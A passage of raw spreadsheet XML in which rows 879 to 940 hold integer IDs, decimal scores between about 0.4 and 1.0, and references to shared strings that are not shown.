        <v>3609</v>
      </c>
      <c r="D879">
        <v>0</v>
      </c>
      <c r="E879">
        <v>0.46740001440048218</v>
      </c>
      <c r="F879" t="s">
        <v>7</v>
      </c>
      <c r="G879" t="s">
        <v>1737</v>
      </c>
      <c r="H879" t="s">
        <v>1738</v>
      </c>
    </row>
    <row r="880" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A880" s="1">
        <v>878</v>
      </c>
      <c r="B880">
        <v>3680</v>
      </c>
      <c r="C880">
        <v>3680</v>
      </c>
      <c r="D880">
        <v>0</v>
      </c>
      <c r="E880">
        <v>0.74849998950958252</v>
      </c>
      <c r="F880" t="s">
        <v>7</v>
      </c>
      <c r="G880" t="s">
        <v>1739</v>
      </c>
      <c r="H880" t="s">
        <v>1740</v>
      </c>
    </row>
    <row r="881" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A881" s="1">
        <v>879</v>
      </c>
      <c r="B881">
        <v>6390</v>
      </c>
      <c r="C881">
        <v>6390</v>
      </c>
      <c r="D881">
        <v>0</v>
      </c>
      <c r="E881">
        <v>0.75220000743865967</v>
      </c>
      <c r="F881" t="s">
        <v>7</v>
      </c>
      <c r="G881" t="s">
        <v>1741</v>
      </c>
      <c r="H881" t="s">
        <v>1742</v>
      </c>
    </row>
    <row r="882" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A882" s="1">
        <v>880</v>
      </c>
      <c r="B882">
        <v>3613</v>
      </c>
      <c r="C882">
        <v>3613</v>
      </c>
      <c r="D882">
        <v>0</v>
      </c>
      <c r="E882">
        <v>0.99629998207092285</v>
      </c>
      <c r="F882" t="s">
        <v>7</v>
      </c>
      <c r="G882" t="s">
        <v>1743</v>
      </c>
      <c r="H882" t="s">
        <v>1744</v>
      </c>
    </row>
    <row r="883" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A883" s="1">
        <v>881</v>
      </c>
      <c r="B883">
        <v>3679</v>
      </c>
      <c r="C883">
        <v>3679</v>
      </c>
      <c r="D883">
        <v>0</v>
      </c>
      <c r="E883">
        <v>0.56929999589920044</v>
      </c>
      <c r="F883" t="s">
        <v>7</v>
      </c>
      <c r="G883" t="s">
        <v>1745</v>
      </c>
      <c r="H883" t="s">
        <v>1746</v>
      </c>
    </row>
    <row r="884" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A884" s="1">
        <v>882</v>
      </c>
      <c r="B884">
        <v>3616</v>
      </c>
      <c r="C884">
        <v>3616</v>
      </c>
      <c r="D884">
        <v>0</v>
      </c>
      <c r="E884">
        <v>0.49320000410079962</v>
      </c>
      <c r="F884" t="s">
        <v>7</v>
      </c>
      <c r="G884" t="s">
        <v>1747</v>
      </c>
      <c r="H884" t="s">
        <v>1748</v>
      </c>
    </row>
    <row r="885" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A885" s="1">
        <v>883</v>
      </c>
      <c r="B885">
        <v>3617</v>
      </c>
      <c r="C885">
        <v>3617</v>
      </c>
      <c r="D885">
        <v>0</v>
      </c>
      <c r="E885">
        <v>0.6184999942779541</v>
      </c>
      <c r="F885" t="s">
        <v>7</v>
      </c>
      <c r="G885" t="s">
        <v>1749</v>
      </c>
      <c r="H885" t="s">
        <v>1750</v>
      </c>
    </row>
    <row r="886" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A886" s="1">
        <v>884</v>
      </c>
      <c r="B886">
        <v>3618</v>
      </c>
      <c r="C886">
        <v>3618</v>
      </c>
      <c r="D886">
        <v>0</v>
      </c>
      <c r="E886">
        <v>0.45179998874664312</v>
      </c>
      <c r="F886" t="s">
        <v>7</v>
      </c>
      <c r="G886" t="s">
        <v>1751</v>
      </c>
      <c r="H886" t="s">
        <v>1752</v>
      </c>
    </row>
    <row r="887" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A887" s="1">
        <v>885</v>
      </c>
      <c r="B887">
        <v>3619</v>
      </c>
      <c r="C887">
        <v>3619</v>
      </c>
      <c r="D887">
        <v>0</v>
      </c>
      <c r="E887">
        <v>0.93879997730255127</v>
      </c>
      <c r="F887" t="s">
        <v>7</v>
      </c>
      <c r="G887" t="s">
        <v>1753</v>
      </c>
      <c r="H887" t="s">
        <v>1754</v>
      </c>
    </row>
    <row r="888" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A888" s="1">
        <v>886</v>
      </c>
      <c r="B888">
        <v>3677</v>
      </c>
      <c r="C888">
        <v>3677</v>
      </c>
      <c r="D888">
        <v>0</v>
      </c>
      <c r="E888">
        <v>0.93279999494552612</v>
      </c>
      <c r="F888" t="s">
        <v>7</v>
      </c>
      <c r="G888" t="s">
        <v>1755</v>
      </c>
      <c r="H888" t="s">
        <v>1756</v>
      </c>
    </row>
    <row r="889" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A889" s="1">
        <v>887</v>
      </c>
      <c r="B889">
        <v>3507</v>
      </c>
      <c r="C889">
        <v>3507</v>
      </c>
      <c r="D889">
        <v>0</v>
      </c>
      <c r="E889">
        <v>0.6841999888420105</v>
      </c>
      <c r="F889" t="s">
        <v>7</v>
      </c>
      <c r="G889" t="s">
        <v>1757</v>
      </c>
      <c r="H889" t="s">
        <v>1758</v>
      </c>
    </row>
    <row r="890" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A890" s="1">
        <v>888</v>
      </c>
      <c r="B890">
        <v>3395</v>
      </c>
      <c r="C890">
        <v>3395</v>
      </c>
      <c r="D890">
        <v>0</v>
      </c>
      <c r="E890">
        <v>0.98420000076293945</v>
      </c>
      <c r="F890" t="s">
        <v>7</v>
      </c>
      <c r="G890" t="s">
        <v>1759</v>
      </c>
      <c r="H890" t="s">
        <v>1760</v>
      </c>
    </row>
    <row r="891" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A891" s="1">
        <v>889</v>
      </c>
      <c r="B891">
        <v>3505</v>
      </c>
      <c r="C891">
        <v>3505</v>
      </c>
      <c r="D891">
        <v>0</v>
      </c>
      <c r="E891">
        <v>0.99849998950958252</v>
      </c>
      <c r="F891" t="s">
        <v>7</v>
      </c>
      <c r="G891" t="s">
        <v>1761</v>
      </c>
      <c r="H891" t="s">
        <v>1762</v>
      </c>
    </row>
    <row r="892" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A892" s="1">
        <v>890</v>
      </c>
      <c r="B892">
        <v>3502</v>
      </c>
      <c r="C892">
        <v>3502</v>
      </c>
      <c r="D892">
        <v>0</v>
      </c>
      <c r="E892">
        <v>0.99730002880096436</v>
      </c>
      <c r="F892" t="s">
        <v>7</v>
      </c>
      <c r="G892" t="s">
        <v>1763</v>
      </c>
      <c r="H892" t="s">
        <v>1764</v>
      </c>
    </row>
    <row r="893" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A893" s="1">
        <v>891</v>
      </c>
      <c r="B893">
        <v>6435</v>
      </c>
      <c r="C893">
        <v>6435</v>
      </c>
      <c r="D893">
        <v>0</v>
      </c>
      <c r="E893">
        <v>0.99620002508163452</v>
      </c>
      <c r="F893" t="s">
        <v>7</v>
      </c>
      <c r="G893" t="s">
        <v>1765</v>
      </c>
      <c r="H893" t="s">
        <v>1766</v>
      </c>
    </row>
    <row r="894" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A894" s="1">
        <v>892</v>
      </c>
      <c r="B894">
        <v>3424</v>
      </c>
      <c r="C894">
        <v>3424</v>
      </c>
      <c r="D894">
        <v>0</v>
      </c>
      <c r="E894">
        <v>0.43520000576972961</v>
      </c>
      <c r="F894" t="s">
        <v>7</v>
      </c>
      <c r="G894" t="s">
        <v>1767</v>
      </c>
      <c r="H894" t="s">
        <v>1768</v>
      </c>
    </row>
    <row r="895" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A895" s="1">
        <v>893</v>
      </c>
      <c r="B895">
        <v>3425</v>
      </c>
      <c r="C895">
        <v>3425</v>
      </c>
      <c r="D895">
        <v>0</v>
      </c>
      <c r="E895">
        <v>0.99959999322891235</v>
      </c>
      <c r="F895" t="s">
        <v>7</v>
      </c>
      <c r="G895" t="s">
        <v>1769</v>
      </c>
      <c r="H895" t="s">
        <v>1770</v>
      </c>
    </row>
    <row r="896" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A896" s="1">
        <v>894</v>
      </c>
      <c r="B896">
        <v>3748</v>
      </c>
      <c r="C896">
        <v>3748</v>
      </c>
      <c r="D896">
        <v>0</v>
      </c>
      <c r="E896">
        <v>0.71569997072219849</v>
      </c>
      <c r="F896" t="s">
        <v>7</v>
      </c>
      <c r="G896" t="s">
        <v>1771</v>
      </c>
      <c r="H896" t="s">
        <v>1772</v>
      </c>
    </row>
    <row r="897" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A897" s="1">
        <v>895</v>
      </c>
      <c r="B897">
        <v>6336</v>
      </c>
      <c r="C897">
        <v>6336</v>
      </c>
      <c r="D897">
        <v>0</v>
      </c>
      <c r="E897">
        <v>0.99639999866485596</v>
      </c>
      <c r="F897" t="s">
        <v>7</v>
      </c>
      <c r="G897" t="s">
        <v>1773</v>
      </c>
      <c r="H897" t="s">
        <v>1774</v>
      </c>
    </row>
    <row r="898" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A898" s="1">
        <v>896</v>
      </c>
      <c r="B898">
        <v>3745</v>
      </c>
      <c r="C898">
        <v>3745</v>
      </c>
      <c r="D898">
        <v>0</v>
      </c>
      <c r="E898">
        <v>0.99830001592636108</v>
      </c>
      <c r="F898" t="s">
        <v>7</v>
      </c>
      <c r="G898" t="s">
        <v>1775</v>
      </c>
      <c r="H898" t="s">
        <v>1776</v>
      </c>
    </row>
    <row r="899" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A899" s="1">
        <v>897</v>
      </c>
      <c r="B899">
        <v>3744</v>
      </c>
      <c r="C899">
        <v>3744</v>
      </c>
      <c r="D899">
        <v>0</v>
      </c>
      <c r="E899">
        <v>0.99430000782012939</v>
      </c>
      <c r="F899" t="s">
        <v>7</v>
      </c>
      <c r="G899" t="s">
        <v>1777</v>
      </c>
      <c r="H899" t="s">
        <v>1778</v>
      </c>
    </row>
    <row r="900" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A900" s="1">
        <v>898</v>
      </c>
      <c r="B900">
        <v>3420</v>
      </c>
      <c r="C900">
        <v>3420</v>
      </c>
      <c r="D900">
        <v>0</v>
      </c>
      <c r="E900">
        <v>0.55169999599456787</v>
      </c>
      <c r="F900" t="s">
        <v>7</v>
      </c>
      <c r="G900" t="s">
        <v>1779</v>
      </c>
      <c r="H900" t="s">
        <v>1780</v>
      </c>
    </row>
    <row r="901" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A901" s="1">
        <v>899</v>
      </c>
      <c r="B901">
        <v>6337</v>
      </c>
      <c r="C901">
        <v>6337</v>
      </c>
      <c r="D901">
        <v>0</v>
      </c>
      <c r="E901">
        <v>0.99250000715255737</v>
      </c>
      <c r="F901" t="s">
        <v>7</v>
      </c>
      <c r="G901" t="s">
        <v>1781</v>
      </c>
      <c r="H901" t="s">
        <v>1782</v>
      </c>
    </row>
    <row r="902" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A902" s="1">
        <v>900</v>
      </c>
      <c r="B902">
        <v>6431</v>
      </c>
      <c r="C902">
        <v>6431</v>
      </c>
      <c r="D902">
        <v>0</v>
      </c>
      <c r="E902">
        <v>0.51620000600814819</v>
      </c>
      <c r="F902" t="s">
        <v>7</v>
      </c>
      <c r="G902" t="s">
        <v>1783</v>
      </c>
      <c r="H902" t="s">
        <v>1784</v>
      </c>
    </row>
    <row r="903" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A903" s="1">
        <v>901</v>
      </c>
      <c r="B903">
        <v>3437</v>
      </c>
      <c r="C903">
        <v>3437</v>
      </c>
      <c r="D903">
        <v>0</v>
      </c>
      <c r="E903">
        <v>0.79739999771118164</v>
      </c>
      <c r="F903" t="s">
        <v>7</v>
      </c>
      <c r="G903" t="s">
        <v>1785</v>
      </c>
      <c r="H903" t="s">
        <v>1786</v>
      </c>
    </row>
    <row r="904" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A904" s="1">
        <v>902</v>
      </c>
      <c r="B904">
        <v>3440</v>
      </c>
      <c r="C904">
        <v>3440</v>
      </c>
      <c r="D904">
        <v>0</v>
      </c>
      <c r="E904">
        <v>0.86820000410079956</v>
      </c>
      <c r="F904" t="s">
        <v>7</v>
      </c>
      <c r="G904" t="s">
        <v>1787</v>
      </c>
      <c r="H904" t="s">
        <v>1788</v>
      </c>
    </row>
    <row r="905" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A905" s="1">
        <v>903</v>
      </c>
      <c r="B905">
        <v>6338</v>
      </c>
      <c r="C905">
        <v>6338</v>
      </c>
      <c r="D905">
        <v>0</v>
      </c>
      <c r="E905">
        <v>0.93169999122619629</v>
      </c>
      <c r="F905" t="s">
        <v>7</v>
      </c>
      <c r="G905" t="s">
        <v>1789</v>
      </c>
      <c r="H905" t="s">
        <v>1790</v>
      </c>
    </row>
    <row r="906" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A906" s="1">
        <v>904</v>
      </c>
      <c r="B906">
        <v>3739</v>
      </c>
      <c r="C906">
        <v>3739</v>
      </c>
      <c r="D906">
        <v>0</v>
      </c>
      <c r="E906">
        <v>0.61690002679824829</v>
      </c>
      <c r="F906" t="s">
        <v>7</v>
      </c>
      <c r="G906" t="s">
        <v>1791</v>
      </c>
      <c r="H906" t="s">
        <v>1792</v>
      </c>
    </row>
    <row r="907" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A907" s="1">
        <v>905</v>
      </c>
      <c r="B907">
        <v>3443</v>
      </c>
      <c r="C907">
        <v>3443</v>
      </c>
      <c r="D907">
        <v>0</v>
      </c>
      <c r="E907">
        <v>0.86000001430511475</v>
      </c>
      <c r="F907" t="s">
        <v>7</v>
      </c>
      <c r="G907" t="s">
        <v>1793</v>
      </c>
      <c r="H907" t="s">
        <v>1794</v>
      </c>
    </row>
    <row r="908" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A908" s="1">
        <v>906</v>
      </c>
      <c r="B908">
        <v>3447</v>
      </c>
      <c r="C908">
        <v>3447</v>
      </c>
      <c r="D908">
        <v>0</v>
      </c>
      <c r="E908">
        <v>0.66479998826980591</v>
      </c>
      <c r="F908" t="s">
        <v>7</v>
      </c>
      <c r="G908" t="s">
        <v>1795</v>
      </c>
      <c r="H908" t="s">
        <v>1796</v>
      </c>
    </row>
    <row r="909" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A909" s="1">
        <v>907</v>
      </c>
      <c r="B909">
        <v>3434</v>
      </c>
      <c r="C909">
        <v>3434</v>
      </c>
      <c r="D909">
        <v>0</v>
      </c>
      <c r="E909">
        <v>0.57249999046325684</v>
      </c>
      <c r="F909" t="s">
        <v>7</v>
      </c>
      <c r="G909" t="s">
        <v>1797</v>
      </c>
      <c r="H909" t="s">
        <v>1798</v>
      </c>
    </row>
    <row r="910" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A910" s="1">
        <v>908</v>
      </c>
      <c r="B910">
        <v>3448</v>
      </c>
      <c r="C910">
        <v>3448</v>
      </c>
      <c r="D910">
        <v>0</v>
      </c>
      <c r="E910">
        <v>0.55430001020431519</v>
      </c>
      <c r="F910" t="s">
        <v>7</v>
      </c>
      <c r="G910" t="s">
        <v>1799</v>
      </c>
      <c r="H910" t="s">
        <v>1800</v>
      </c>
    </row>
    <row r="911" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A911" s="1">
        <v>909</v>
      </c>
      <c r="B911">
        <v>3419</v>
      </c>
      <c r="C911">
        <v>3419</v>
      </c>
      <c r="D911">
        <v>0</v>
      </c>
      <c r="E911">
        <v>0.99610000848770142</v>
      </c>
      <c r="F911" t="s">
        <v>7</v>
      </c>
      <c r="G911" t="s">
        <v>1801</v>
      </c>
      <c r="H911" t="s">
        <v>1802</v>
      </c>
    </row>
    <row r="912" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A912" s="1">
        <v>910</v>
      </c>
      <c r="B912">
        <v>3417</v>
      </c>
      <c r="C912">
        <v>3417</v>
      </c>
      <c r="D912">
        <v>0</v>
      </c>
      <c r="E912">
        <v>0.99959999322891235</v>
      </c>
      <c r="F912" t="s">
        <v>7</v>
      </c>
      <c r="G912" t="s">
        <v>1803</v>
      </c>
      <c r="H912" t="s">
        <v>1770</v>
      </c>
    </row>
    <row r="913" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A913" s="1">
        <v>911</v>
      </c>
      <c r="B913">
        <v>3397</v>
      </c>
      <c r="C913">
        <v>3397</v>
      </c>
      <c r="D913">
        <v>0</v>
      </c>
      <c r="E913">
        <v>0.99599999189376831</v>
      </c>
      <c r="F913" t="s">
        <v>7</v>
      </c>
      <c r="G913" t="s">
        <v>1804</v>
      </c>
      <c r="H913" t="s">
        <v>1805</v>
      </c>
    </row>
    <row r="914" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A914" s="1">
        <v>912</v>
      </c>
      <c r="B914">
        <v>3398</v>
      </c>
      <c r="C914">
        <v>3398</v>
      </c>
      <c r="D914">
        <v>0</v>
      </c>
      <c r="E914">
        <v>0.69889998435974121</v>
      </c>
      <c r="F914" t="s">
        <v>7</v>
      </c>
      <c r="G914" t="s">
        <v>1806</v>
      </c>
      <c r="H914" t="s">
        <v>1807</v>
      </c>
    </row>
    <row r="915" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A915" s="1">
        <v>913</v>
      </c>
      <c r="B915">
        <v>6442</v>
      </c>
      <c r="C915">
        <v>6442</v>
      </c>
      <c r="D915">
        <v>0</v>
      </c>
      <c r="E915">
        <v>0.83009999990463257</v>
      </c>
      <c r="F915" t="s">
        <v>7</v>
      </c>
      <c r="G915" t="s">
        <v>1808</v>
      </c>
      <c r="H915" t="s">
        <v>1809</v>
      </c>
    </row>
    <row r="916" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A916" s="1">
        <v>914</v>
      </c>
      <c r="B916">
        <v>6328</v>
      </c>
      <c r="C916">
        <v>6328</v>
      </c>
      <c r="D916">
        <v>0</v>
      </c>
      <c r="E916">
        <v>0.5471000075340271</v>
      </c>
      <c r="F916" t="s">
        <v>7</v>
      </c>
      <c r="G916" t="s">
        <v>1810</v>
      </c>
      <c r="H916" t="s">
        <v>1811</v>
      </c>
    </row>
    <row r="917" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A917" s="1">
        <v>915</v>
      </c>
      <c r="B917">
        <v>3402</v>
      </c>
      <c r="C917">
        <v>3402</v>
      </c>
      <c r="D917">
        <v>0</v>
      </c>
      <c r="E917">
        <v>0.99330002069473267</v>
      </c>
      <c r="F917" t="s">
        <v>7</v>
      </c>
      <c r="G917" t="s">
        <v>1812</v>
      </c>
      <c r="H917" t="s">
        <v>1813</v>
      </c>
    </row>
    <row r="918" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A918" s="1">
        <v>916</v>
      </c>
      <c r="B918">
        <v>3403</v>
      </c>
      <c r="C918">
        <v>3403</v>
      </c>
      <c r="D918">
        <v>0</v>
      </c>
      <c r="E918">
        <v>0.99190002679824829</v>
      </c>
      <c r="F918" t="s">
        <v>7</v>
      </c>
      <c r="G918" t="s">
        <v>1814</v>
      </c>
      <c r="H918" t="s">
        <v>1815</v>
      </c>
    </row>
    <row r="919" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A919" s="1">
        <v>917</v>
      </c>
      <c r="B919">
        <v>3404</v>
      </c>
      <c r="C919">
        <v>3404</v>
      </c>
      <c r="D919">
        <v>0</v>
      </c>
      <c r="E919">
        <v>0.47249999642372131</v>
      </c>
      <c r="F919" t="s">
        <v>7</v>
      </c>
      <c r="G919" t="s">
        <v>1816</v>
      </c>
      <c r="H919" t="s">
        <v>1817</v>
      </c>
    </row>
    <row r="920" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A920" s="1">
        <v>918</v>
      </c>
      <c r="B920">
        <v>3418</v>
      </c>
      <c r="C920">
        <v>3418</v>
      </c>
      <c r="D920">
        <v>0</v>
      </c>
      <c r="E920">
        <v>0.99489998817443848</v>
      </c>
      <c r="F920" t="s">
        <v>7</v>
      </c>
      <c r="G920" t="s">
        <v>1818</v>
      </c>
      <c r="H920" t="s">
        <v>1819</v>
      </c>
    </row>
    <row r="921" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A921" s="1">
        <v>919</v>
      </c>
      <c r="B921">
        <v>3405</v>
      </c>
      <c r="C921">
        <v>3405</v>
      </c>
      <c r="D921">
        <v>0</v>
      </c>
      <c r="E921">
        <v>0.60460001230239868</v>
      </c>
      <c r="F921" t="s">
        <v>7</v>
      </c>
      <c r="G921" t="s">
        <v>1820</v>
      </c>
      <c r="H921" t="s">
        <v>1821</v>
      </c>
    </row>
    <row r="922" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A922" s="1">
        <v>920</v>
      </c>
      <c r="B922">
        <v>6331</v>
      </c>
      <c r="C922">
        <v>6331</v>
      </c>
      <c r="D922">
        <v>0</v>
      </c>
      <c r="E922">
        <v>0.99900001287460327</v>
      </c>
      <c r="F922" t="s">
        <v>7</v>
      </c>
      <c r="G922" t="s">
        <v>1822</v>
      </c>
      <c r="H922" t="s">
        <v>844</v>
      </c>
    </row>
    <row r="923" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A923" s="1">
        <v>921</v>
      </c>
      <c r="B923">
        <v>3410</v>
      </c>
      <c r="C923">
        <v>3410</v>
      </c>
      <c r="D923">
        <v>0</v>
      </c>
      <c r="E923">
        <v>0.99659997224807739</v>
      </c>
      <c r="F923" t="s">
        <v>7</v>
      </c>
      <c r="G923" t="s">
        <v>1823</v>
      </c>
      <c r="H923" t="s">
        <v>1824</v>
      </c>
    </row>
    <row r="924" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A924" s="1">
        <v>922</v>
      </c>
      <c r="B924">
        <v>3411</v>
      </c>
      <c r="C924">
        <v>3411</v>
      </c>
      <c r="D924">
        <v>0</v>
      </c>
      <c r="E924">
        <v>0.99959999322891235</v>
      </c>
      <c r="F924" t="s">
        <v>7</v>
      </c>
      <c r="G924" t="s">
        <v>1825</v>
      </c>
      <c r="H924" t="s">
        <v>1770</v>
      </c>
    </row>
    <row r="925" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A925" s="1">
        <v>923</v>
      </c>
      <c r="B925">
        <v>6438</v>
      </c>
      <c r="C925">
        <v>6438</v>
      </c>
      <c r="D925">
        <v>0</v>
      </c>
      <c r="E925">
        <v>0.9944000244140625</v>
      </c>
      <c r="F925" t="s">
        <v>7</v>
      </c>
      <c r="G925" t="s">
        <v>1826</v>
      </c>
      <c r="H925" t="s">
        <v>1827</v>
      </c>
    </row>
    <row r="926" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A926" s="1">
        <v>924</v>
      </c>
      <c r="B926">
        <v>3414</v>
      </c>
      <c r="C926">
        <v>3414</v>
      </c>
      <c r="D926">
        <v>0</v>
      </c>
      <c r="E926">
        <v>0.96420001983642578</v>
      </c>
      <c r="F926" t="s">
        <v>7</v>
      </c>
      <c r="G926" t="s">
        <v>1828</v>
      </c>
      <c r="H926" t="s">
        <v>1829</v>
      </c>
    </row>
    <row r="927" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A927" s="1">
        <v>925</v>
      </c>
      <c r="B927">
        <v>3415</v>
      </c>
      <c r="C927">
        <v>3415</v>
      </c>
      <c r="D927">
        <v>0</v>
      </c>
      <c r="E927">
        <v>0.74180001020431519</v>
      </c>
      <c r="F927" t="s">
        <v>7</v>
      </c>
      <c r="G927" t="s">
        <v>1830</v>
      </c>
      <c r="H927" t="s">
        <v>1831</v>
      </c>
    </row>
    <row r="928" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A928" s="1">
        <v>926</v>
      </c>
      <c r="B928">
        <v>3416</v>
      </c>
      <c r="C928">
        <v>3416</v>
      </c>
      <c r="D928">
        <v>0</v>
      </c>
      <c r="E928">
        <v>0.99959999322891235</v>
      </c>
      <c r="F928" t="s">
        <v>7</v>
      </c>
      <c r="G928" t="s">
        <v>1832</v>
      </c>
      <c r="H928" t="s">
        <v>1770</v>
      </c>
    </row>
    <row r="929" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A929" s="1">
        <v>927</v>
      </c>
      <c r="B929">
        <v>6330</v>
      </c>
      <c r="C929">
        <v>6330</v>
      </c>
      <c r="D929">
        <v>0</v>
      </c>
      <c r="E929">
        <v>0.44470000267028809</v>
      </c>
      <c r="F929" t="s">
        <v>7</v>
      </c>
      <c r="G929" t="s">
        <v>1833</v>
      </c>
      <c r="H929" t="s">
        <v>1834</v>
      </c>
    </row>
    <row r="930" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A930" s="1">
        <v>928</v>
      </c>
      <c r="B930">
        <v>3450</v>
      </c>
      <c r="C930">
        <v>3450</v>
      </c>
      <c r="D930">
        <v>0</v>
      </c>
      <c r="E930">
        <v>0.41139999032020569</v>
      </c>
      <c r="F930" t="s">
        <v>7</v>
      </c>
      <c r="G930" t="s">
        <v>1835</v>
      </c>
      <c r="H930" t="s">
        <v>1836</v>
      </c>
    </row>
    <row r="931" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A931" s="1">
        <v>929</v>
      </c>
      <c r="B931">
        <v>3453</v>
      </c>
      <c r="C931">
        <v>3453</v>
      </c>
      <c r="D931">
        <v>0</v>
      </c>
      <c r="E931">
        <v>0.49360001087188721</v>
      </c>
      <c r="F931" t="s">
        <v>7</v>
      </c>
      <c r="G931" t="s">
        <v>1837</v>
      </c>
      <c r="H931" t="s">
        <v>1838</v>
      </c>
    </row>
    <row r="932" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A932" s="1">
        <v>930</v>
      </c>
      <c r="B932">
        <v>3457</v>
      </c>
      <c r="C932">
        <v>3457</v>
      </c>
      <c r="D932">
        <v>0</v>
      </c>
      <c r="E932">
        <v>0.55940002202987671</v>
      </c>
      <c r="F932" t="s">
        <v>7</v>
      </c>
      <c r="G932" t="s">
        <v>1839</v>
      </c>
      <c r="H932" t="s">
        <v>1840</v>
      </c>
    </row>
    <row r="933" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A933" s="1">
        <v>931</v>
      </c>
      <c r="B933">
        <v>3484</v>
      </c>
      <c r="C933">
        <v>3484</v>
      </c>
      <c r="D933">
        <v>0</v>
      </c>
      <c r="E933">
        <v>0.99559998512268066</v>
      </c>
      <c r="F933" t="s">
        <v>7</v>
      </c>
      <c r="G933" t="s">
        <v>1841</v>
      </c>
      <c r="H933" t="s">
        <v>1842</v>
      </c>
    </row>
    <row r="934" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A934" s="1">
        <v>932</v>
      </c>
      <c r="B934">
        <v>3485</v>
      </c>
      <c r="C934">
        <v>3485</v>
      </c>
      <c r="D934">
        <v>0</v>
      </c>
      <c r="E934">
        <v>0.99769997596740723</v>
      </c>
      <c r="F934" t="s">
        <v>7</v>
      </c>
      <c r="G934" t="s">
        <v>1843</v>
      </c>
      <c r="H934" t="s">
        <v>1844</v>
      </c>
    </row>
    <row r="935" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A935" s="1">
        <v>933</v>
      </c>
      <c r="B935">
        <v>3486</v>
      </c>
      <c r="C935">
        <v>3486</v>
      </c>
      <c r="D935">
        <v>0</v>
      </c>
      <c r="E935">
        <v>0.52380001544952393</v>
      </c>
      <c r="F935" t="s">
        <v>7</v>
      </c>
      <c r="G935" t="s">
        <v>1845</v>
      </c>
      <c r="H935" t="s">
        <v>1846</v>
      </c>
    </row>
    <row r="936" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A936" s="1">
        <v>934</v>
      </c>
      <c r="B936">
        <v>3487</v>
      </c>
      <c r="C936">
        <v>3487</v>
      </c>
      <c r="D936">
        <v>0</v>
      </c>
      <c r="E936">
        <v>0.99620002508163452</v>
      </c>
      <c r="F936" t="s">
        <v>7</v>
      </c>
      <c r="G936" t="s">
        <v>1847</v>
      </c>
      <c r="H936" t="s">
        <v>1848</v>
      </c>
    </row>
    <row r="937" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A937" s="1">
        <v>935</v>
      </c>
      <c r="B937">
        <v>3488</v>
      </c>
      <c r="C937">
        <v>3488</v>
      </c>
      <c r="D937">
        <v>0</v>
      </c>
      <c r="E937">
        <v>0.61949998140335083</v>
      </c>
      <c r="F937" t="s">
        <v>7</v>
      </c>
      <c r="G937" t="s">
        <v>1849</v>
      </c>
      <c r="H937" t="s">
        <v>1850</v>
      </c>
    </row>
    <row r="938" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A938" s="1">
        <v>936</v>
      </c>
      <c r="B938">
        <v>3491</v>
      </c>
      <c r="C938">
        <v>3491</v>
      </c>
      <c r="D938">
        <v>0</v>
      </c>
      <c r="E938">
        <v>0.96230000257492065</v>
      </c>
      <c r="F938" t="s">
        <v>7</v>
      </c>
      <c r="G938" t="s">
        <v>1851</v>
      </c>
      <c r="H938" t="s">
        <v>179</v>
      </c>
    </row>
    <row r="939" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A939" s="1">
        <v>937</v>
      </c>
      <c r="B939">
        <v>3492</v>
      </c>
      <c r="C939">
        <v>3492</v>
      </c>
      <c r="D939">
        <v>0</v>
      </c>
      <c r="E939">
        <v>0.64850002527236938</v>
      </c>
      <c r="F939" t="s">
        <v>7</v>
      </c>
      <c r="G939" t="s">
        <v>1852</v>
      </c>
      <c r="H939" t="s">
        <v>1853</v>
      </c>
    </row>
    <row r="940" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A940" s="1">
        <v>938</v>
      </c>
      <c r="B940">
        <v>3483</v>
      </c>
